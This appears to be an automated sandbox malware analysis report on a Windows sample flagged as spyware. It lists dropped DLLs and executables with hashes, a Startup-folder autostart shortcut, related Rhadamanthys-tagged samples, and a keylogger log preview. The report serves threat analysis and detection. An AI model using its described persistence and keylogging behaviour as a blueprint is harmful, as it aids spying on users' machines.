                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                        Sample name:YoS6ZBCcUy.exe
                                                                                                                                                                        renamed because original name is a hash value
                                                                                                                                                                        Original Sample Name:9e19fd2499e9ffb9ca4eab08d9054a86.exe
                                                                                                                                                                        Detection:MAL
                                                                                                                                                                        Classification:mal100.spre.spyw.evad.winEXE@65/132@0/1
                                                                                                                                                                        EGA Information:
                                                                                                                                                                        • Successful, ratio: 60%
                                                                                                                                                                        HCA Information:
                                                                                                                                                                        • Successful, ratio: 85%
                                                                                                                                                                        • Number of executed functions: 97
                                                                                                                                                                        • Number of non-executed functions: 236
                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ocsps.ssl.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 1020 because it is empty
                                                                                                                                                                        • Execution Graph export aborted for target winSAT.exe, PID 7232 because there are no executed function
                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                        • VT rate limit hit for: YoS6ZBCcUy.exe
Time | Type | Description
11:33:45 | API Interceptor | 22x Sleep call for process: YoS6ZBCcUy.exe modified
11:34:05 | API Interceptor | 106x Sleep call for process: powershell.exe modified
11:34:46 | API Interceptor | 4866773x Sleep call for process: Bginfo.exe modified
16:34:09 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk
Match: C:\Users\user\AppData\Local\Programs\NSIS\d3dcompiler_47.dll
Associated Sample Name / URL | Detection | Threat Name
G4fDWS1Fpd.exe | malicious | Unknown
a2zZyepQzF.exe | malicious | RHADAMANTHYS
kCKthbZCUf.exe | malicious | Unknown
G4fDWS1Fpd.exe | malicious | Unknown
a2zZyepQzF.exe | malicious | RHADAMANTHYS
kCKthbZCUf.exe | malicious | Unknown
cMqyGFCQHk.exe | malicious | Unknown
cMqyGFCQHk.exe | malicious | Unknown
Soltix.exe | malicious | Unknown
Soltix.exe | malicious | Unknown
                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):162
                                                                                                                                                                                            Entropy (8bit):3.3867890666236815
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:rhlKlyKwl8QlfNNqlDl5JWRal2Jl+7R0DAlBG4moojklovDl6v:6lZwlzF4b5YcIeeDAlS1gWAv
                                                                                                                                                                                            MD5:9B4280DA42FA2027360DCDD2D0427824
                                                                                                                                                                                            SHA1:BEEC7BF9D6DF9CDE5246C2A65DD4B878E5540759
                                                                                                                                                                                            SHA-256:F54F7F20B7C5144500C8DA5D4A14AA6674E9604CE5C380487416E28581C4DA70
                                                                                                                                                                                            SHA-512:6B56FF4BC00C4DA43EE2711D42CA084DCC496D7AAF15E40C99575A3A7178F245F103634927C70AA26B0DFA76DC0D88820D5D1499138B177E80C21B9B1F8E5B5F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:....[.2.0.2.4./.1.2./.0.6. .1.1.:.3.4.:.1.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):65552
                                                                                                                                                                                            Entropy (8bit):0.01264908944072593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:2HlGlll/l/lXp9ZjrPBY0lllt6Jll/DP:Q0dPBY0l/m/7
                                                                                                                                                                                            MD5:566AA8F49C78E579C56ED41C59BFEB7E
                                                                                                                                                                                            SHA1:FA328DD4147ECD6A884327606BEE24C6DFB6AE51
                                                                                                                                                                                            SHA-256:EB5561845D56824EAC51A1F7FB2336962A4BCFE886E6B96FEC8B557060A7B307
                                                                                                                                                                                            SHA-512:BCBF21F45D7F5E69BC2FD4C3BB2FA9C88B4B3C3B779BCFC9D64D456E572E8B63A7128BBBC998565FCCB5EE32F465FA9CD2F6352C180D489D0DC43A546103DA16
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:R:R
                                                                                                                                                                                            MD5:F49655F856ACB8884CC0ACE29216F511
                                                                                                                                                                                            SHA1:CB0F1F87EC0455EC349AAA950C600475AC7B7B6B
                                                                                                                                                                                            SHA-256:7852FCE59C67DDF1D6B8B997EAA1ADFAC004A9F3A91C37295DE9223674011FBA
                                                                                                                                                                                            SHA-512:599E93D25B174524495ED29653052B3590133096404873318F05FD68F4C9A5C9A3B30574551141FBB73D7329D6BE342699A17F3AE84554BAB784776DFDA2D5F8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:EERF
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:Matlab v4 mat-file (little endian) (, numeric, rows 0, columns 16, imaginary
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                            Entropy (8bit):0.025208649790775896
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:9llvlVbd2DJqojrwRAal0dhOEjlpQlyEXl1lAbl7VC5KCCLaldatt3llaia9sVQr:q9q0sRKUEZ+lX1IbRUUvm6tT2Hrn
                                                                                                                                                                                            MD5:CA79AE151CFA2528F44E91763BFC38D6
                                                                                                                                                                                            SHA1:2537D33C167B6CDB2E9A214BB75369EB457C68CF
                                                                                                                                                                                            SHA-256:49636115365E4B80194ACE85CC4B6E30F9C414E6272163E3621D8C9644EA2AB2
                                                                                                                                                                                            SHA-512:25EB6735657C94AA7052C8BB113B0121FF8031E3414F09DFA50EE763542DD7144600B42693768F03E41CB6B8B1B9778DC77AD16535EBF2BB50436524056A3AED
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:................h...(....x:no.&A.e.u~+..C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.r.o.g.r.a.m.s.\.N.S.I.S.\.N.S.I.S...e.x.e.......................(...p.DJ!.IL.....Zm.F............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1096
                                                                                                                                                                                            Entropy (8bit):5.13006727705212
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:36DiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:36DiJzfPvGt7ICQH+sfIte36AFD
                                                                                                                                                                                            MD5:4D42118D35941E0F664DDDBD83F633C5
                                                                                                                                                                                            SHA1:2B21EC5F20FE961D15F2B58EFB1368E66D202E5C
                                                                                                                                                                                            SHA-256:5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
                                                                                                                                                                                            SHA-512:3FFBBA2E4CD689F362378F6B0F6060571F57E228D3755BDD308283BE6CBBEF8C2E84BEB5FCF73E0C3C81CD944D01EE3FCF141733C4D8B3B0162E543E0B9F3E63
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:Copyright (c) Electron contributors.Copyright (c) 2013-2020 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISIN
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):9099045
                                                                                                                                                                                            Entropy (8bit):4.754770173605162
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24576:2o9dQ06p6j6j1WOwRiXjYmfy6k6mjK64jK6gjK6e6cjK6feGjl8PpE:BFOeGT
                                                                                                                                                                                            MD5:6FF57C0AECCDF44C39C95DEE9ECEA805
                                                                                                                                                                                            SHA1:C76669A1354067A1C3DDBC032E66C323286A8D43
                                                                                                                                                                                            SHA-256:0BA4C7B781E9F149195A23D3BE0F704945F858A581871A9FEDD353F12CE839CA
                                                                                                                                                                                            SHA-512:D6108E1D1D52AA3199FF051C7B951025DBF51C5CB18E8920304116DCEF567367ED682245900FDA3AD354C5D50AA5A3C4E6872570A839A3A55D3A9B7579BDFA24
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: Generated by licenses.py; do not edit. --><!doctype html>.<html>.<head>.<meta charset="utf-8">.<meta name="viewport" content="width=device-width">.<meta name="color-scheme" content="light dark">.<title>Credits</title>.<link rel="stylesheet" href="chrome://resources/css/text_defaults.css">.<link rel="stylesheet" href="chrome://credits/credits.css">.</head>.<body>.<span class="page-title">Credits</span>.<a id="print-link" href="#" hidden>Print</a>.<label class="show show-all" tabindex="0">.<input type="checkbox" hidden>.</label>.<div class="open-sourced">. Chromium software is made available as source code. <a href="https://source.chromium.org/chromium">here</a>..</div>..<div style="clear:both; overflow:auto;"> Chromium <3s the following projects -->.<div class="product">.<span class="title">2-dim General Purpose FFT (Fast Fourier/Cosine/Sine Transform) Package</span>.<span class="homepage"><a href="http://www.kurims.kyoto-u.ac.jp/~ooura/fft.html">homepage</a></span>.<labe
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):188826112
                                                                                                                                                                                            Entropy (8bit):6.758169658073029
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1572864:1wl41lgY+w9QLv1JWYc6UeOtUUGQUT1jdu4BPPuuwT2GOqiB1sr7zjg7ob753oUV:rF4oD0QdG09P
                                                                                                                                                                                            MD5:BD4906B9305AFEC35A88A3387BCB9FAC
                                                                                                                                                                                            SHA1:1D32E6F1C6BA770C3B2625D0241BE0F2D4581B5D
                                                                                                                                                                                            SHA-256:A674229C90366A8300AD63C8AE675C2BC1C12307BCCB00AE818DFA67C1955BF5
                                                                                                                                                                                            SHA-512:40966C176EAF9E025597599CB99532B3C36C3E72BCF991B95A450EB26F663B61A79933D741CCE807E18C198239E3C49973189E9EB2CDBAF4B29115A6C25FF09A
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......g.........."......FH.........`IY........@.............................P............`..........................................d..k...0...h....`m.......#...H...........q..5..P.......................0...(....}H.@............................................text...*DH......FH................. ..`.rdata.......`H......LH.............@..@.data....H......L..................@....pdata....H...#...H.................@..@.gxfg....B...pl..D....-.............@..@.retplne......l......*...................rodata.......l......,.............. ..`.tls..........l......>..............@...CPADinfo8.....m......D..............@...LZMADEC.......m......F.............. ..`_RDATA.......0m......X..............@..@malloc_h.....@m......Z.............. ..`prot.........Pm......\..............@..@.rsrc........`m......^..............@..@.reloc...5....q..6....2.............@..B................
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):151599
                                                                                                                                                                                            Entropy (8bit):7.915992368779121
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:ez8JCGIdTwTPagr8o9RHi/T9P1L2o418Gb0+VRLf0ld0GY3cQ3ERVm2I:ez81IdT8agr8EC/T95K18Gb0OV8ld0Gq
                                                                                                                                                                                            MD5:83EC43F2AF9FC52025F3F807B185D424
                                                                                                                                                                                            SHA1:EA432F7571D89DD43A76D260CB5853CADA253AA0
                                                                                                                                                                                            SHA-256:A659EE9EB38636F85F5336587C578FB29740D3EFFAFF9B92852C8A210E92978C
                                                                                                                                                                                            SHA-512:6DDCA85215BF6F7F9B17C5D52BD7395702515BC2354A8CD8FA6C1CCD7355A23B17828853CEABEEF597B5BCA11750DC7C9F6EC3C45A33C2106F816FEC74963D86
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):228644
                                                                                                                                                                                            Entropy (8bit):7.946488830213853
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:coDQYajN6svyA6nI86ur8EC/T9ugx5GMRejnbdZnVE6YoppO4:cVfjN6svyA6D4B79a6edhVELoXO4
                                                                                                                                                                                            MD5:DC48A33BD20BFC7CACFC925A84B015B6
                                                                                                                                                                                            SHA1:8DFEE88FD1DC77F89AD88C19146FE3AB45E43F3C
                                                                                                                                                                                            SHA-256:2C1B3E4B8A0CF837AE0A390FCA54F45D7D22418E040F1DFEA979622383ACCED6
                                                                                                                                                                                            SHA-512:1D54EB5D2BA06AF0BA8F6B491B0D43F178A48AC82CDF383BEB265E732DDFC06BCA9692003FDFCE56F7F00AF97F29ACF046C73B891B8C561610098F9626EAF05A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4916728
                                                                                                                                                                                            Entropy (8bit):6.398031738914566
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:hCZnRO4XyM53Rkq4ypQqdoRpmruVNYvkaRwvdiD0N+YEzI4og/RfzHLeHTRhFRN1:oG2QCwmHjnog/pzHAo/Ayc
                                                                                                                                                                                            MD5:A7B7470C347F84365FFE1B2072B4F95C
                                                                                                                                                                                            SHA1:57A96F6FB326BA65B7F7016242132B3F9464C7A3
                                                                                                                                                                                            SHA-256:AF7B99BE1B8770C0E4D18E43B04E81D11BDEB667FA6B07ADE7A88F4C5676BF9A
                                                                                                                                                                                            SHA-512:83391A219631F750499FD9642D59EC80FB377C378997B302D10762E83325551BB97C1086B181FFF0521B1CA933E518EAB71A44A3578A23691F215EBB1DCE463D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                            • Filename: G4fDWS1Fpd.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: a2zZyepQzF.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: kCKthbZCUf.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: cMqyGFCQHk.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: Soltix.exe, Detection: malicious, Browse
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2929152
                                                                                                                                                                                            Entropy (8bit):6.70454100720416
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:ZBAnytEwrZu/3Q8rvnh2UGH6qfhtvRIdefZiC6Cry2:ZBFE6kfbrvnh21K+io
                                                                                                                                                                                            MD5:5A168CB3EA9D0E7400BAABF60F6AB933
                                                                                                                                                                                            SHA1:82A86CB7F42294AB4AD6669C19B92605D960B676
                                                                                                                                                                                            SHA-256:AF5F1BC9F6A73750FA0C7BF17439700CFB3AB23E1393F0C9899825417E319B54
                                                                                                                                                                                            SHA-512:7C1441ECD049543E38297A7B6929E9F3EB978422D0CE508FBE6350FFEBD297F947B8D9EC75BD2054142DCD8461EEF1BF110E040D0830DA977FDE8944BECE843D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):10468208
                                                                                                                                                                                            Entropy (8bit):6.265606239082294
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:196608:+SPBhORiYAXHiXUxY/iJ53IWhlVjEeIu2Y6U:++wkpHiXUxY/iJ53IWhlVjEeIZU
                                                                                                                                                                                            MD5:FFD67C1E24CB35DC109A24024B1BA7EC
                                                                                                                                                                                            SHA1:99F545BC396878C7A53E98A79017D9531AF7C1F5
                                                                                                                                                                                            SHA-256:9AE98C06CBB0EA43C5CD6B5725310C008C65E46072421A1118CB88E1DE9A8B92
                                                                                                                                                                                            SHA-512:E1A865E685D2D3BACD0916D4238A79462519D887FEB273A251120BB6AF2B4481D025F3B21CE9A1A95A49371A0AA3ECF072175BA756974E831DBFDE1F0FEAEB79
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):493056
                                                                                                                                                                                            Entropy (8bit):6.3672588781107775
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:0PfRujpqWG9btH+M1wLPfj9iDcHetGsHUN0dxI2H6sNkD4Fvh2W:eAWt+MWLPfjkVGbN0dxI2H63D4Bh2
                                                                                                                                                                                            MD5:39CCF402A62F068A8C573B45EA96154D
                                                                                                                                                                                            SHA1:57CEB915EA6F88C7FCCA35339BF951659C0338AB
                                                                                                                                                                                            SHA-256:8649D77ACE8E5753B9A10E7AE3349AAFA9D8E3406BA9C8C36A59633A84B3C41B
                                                                                                                                                                                            SHA-512:C4F9225C54D413176CB3DD2B26D429493FD056C7C283BC7A1C52B4A2059DBB11380DAF5D847BE1FF29F058BA0EF44D4BF66A3D9E9A600000DC8F6D20DFB2ED03
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):8418304
                                                                                                                                                                                            Entropy (8bit):6.508090684401189
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:98304:Q7XpFwEPVsR+1HYJnahAB4tVsX43wYMg:QXVrAtsw
                                                                                                                                                                                            MD5:F055A130C79BD517BDB53B1F8A38BD3B
                                                                                                                                                                                            SHA1:9FBA0AD4BA973BB285B23CC125004BAF61A98B5A
                                                                                                                                                                                            SHA-256:45B53759392B81CE7D916B3F1CF02BE30289809BD31D09FC1524EF2609183B17
                                                                                                                                                                                            SHA-512:D9DCB217F268862C577CACF4E9F84C63E02B647113D484338A74EB0B24FADD6D87B4E7A551DD1EF692BB38E44562BFF848982ACB62840D4F49F91A7751320E34
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):262144
                                                                                                                                                                                            Entropy (8bit):7.040362388355635
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:1YY/D4hH334/EDRom7sMD+ztiU6YW9+cYjb0w7C+TS4idLekmS:1YYkhYeRoHt8U6xwcmb0wr1S
                                                                                                                                                                                            MD5:B9C1E07B4B2EDA5D3650ACAD008B8374
                                                                                                                                                                                            SHA1:5F193013D0F9CAA41E1A1B2441E5E969315803C7
                                                                                                                                                                                            SHA-256:A94785C2269DA10BC56B8B2D526E6028B22D62D0961DB3129ABC0208416C119E
                                                                                                                                                                                            SHA-512:67EFFA650CEB69AFBE040385F017F22BA270AB04AB7CF9AB5B2A64F4D0ECB6D6F29809BD49EE9C9F0AD42D9BFBAB595F213FB276259D62F8C48D97431AFD0708
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):226816
                                                                                                                                                                                            Entropy (8bit):6.641421803992435
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:6BrX/YVAjaKHMVJcjt4FyZTYTC1leMllGbmPVMpJv:6B7XmFJQtHZTkojllGbmPVMj
                                                                                                                                                                                            MD5:66DE65D980D40F3AAAC3DA64BE631A91
                                                                                                                                                                                            SHA1:E9DB45421829AADF312EE888F5340ADE4545AF89
                                                                                                                                                                                            SHA-256:1CB9FCC2D76F51DBD08D58209C3E732B1ABD0C1C0A3760D95374C68C890FF010
                                                                                                                                                                                            SHA-512:FA8BC38B7C5D663497C1798A292D75F768D528CFE272F23C1CC3A4CDAE80229772832BD45B54D2CE1815D347C941371EB87B84DCC794EAAE515109F5B71F2FB4
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):240640
                                                                                                                                                                                            Entropy (8bit):6.667927891589239
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:esErpWAZCtSlQ1iXhZccj6sfkuUYLB+UjNQANSSpv:3E9ziycQ6HuUM95QANSSp
                                                                                                                                                                                            MD5:92B547FB6A5E079A00955B13E67E415B
                                                                                                                                                                                            SHA1:28EAFA6CDDC0CD132B3AB1CD4C00A0A7C8A04014
                                                                                                                                                                                            SHA-256:75A0725E4560801B81B0CC9A35A805012403072EBCE5F70500C2435B6E128056
                                                                                                                                                                                            SHA-512:1F764832690BC718C798F30250977D6A38D47E6093CBC2CA1BC7665386C4FDC55DECBD324302F59AAD15238EC9F8AC3EF7DF5CC85E090309AAF2782B36220471
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...dIEg.........." ......................................................... ............`..........................................[..R...2a..(...............................H....[.............................. ...@............c..H............................text...H........................... ..`.rdata..L...........................@..@.data...p............n..............@....pdata...............z..............@..@.00cfg..8...........................@..@.gxfg...p...........................@..@.retplne................................_RDATA..............................@..@.rsrc...............................@..@.reloc..H...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2198952
                                                                                                                                                                                            Entropy (8bit):6.563177058140165
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:f0eL6aJyxz8eGSfmOifv0LkifQvl9Hu1QEBWfzbnWKNSq:seLWz8TSfmxfv05Qvl9Hu1fBWfzbnWs
                                                                                                                                                                                            MD5:3AEF228FB7EE187160482084D36C9726
                                                                                                                                                                                            SHA1:8B76990C5061890C94F81F504C5782912A58D8A6
                                                                                                                                                                                            SHA-256:C885DF88693496D5C28AD16A1ECDE259E191F54AD76428857742AF843B846C53
                                                                                                                                                                                            SHA-512:E659A7CF12C6B41879E4CE987E4CD1CEFCE2FFC74E06817667FA833764F36F25CC5F8374DBC844B68B787ACAC011C7B8C8F2B74563BF8A96F623EBB110A593DA
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ck.'...'...'...lr..<...lr......lr......lr..&...q..3...q..0...q..K...lr......'...D...q..&...q..4...qp.&...'...&...q..&...Rich'...........PE..L...7..c.........."....!.\...................p....@..........................@".....h.!...@..........................................@...............f!..'.... .h%..pw..T....................x.......v..@............p..D............................text...<Z.......\.................. ..`.rdata..R....p.......`..............@..@.data........@...Z..."..............@....rsrc........@.......|..............@..@.reloc..h%.... ..&...@..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
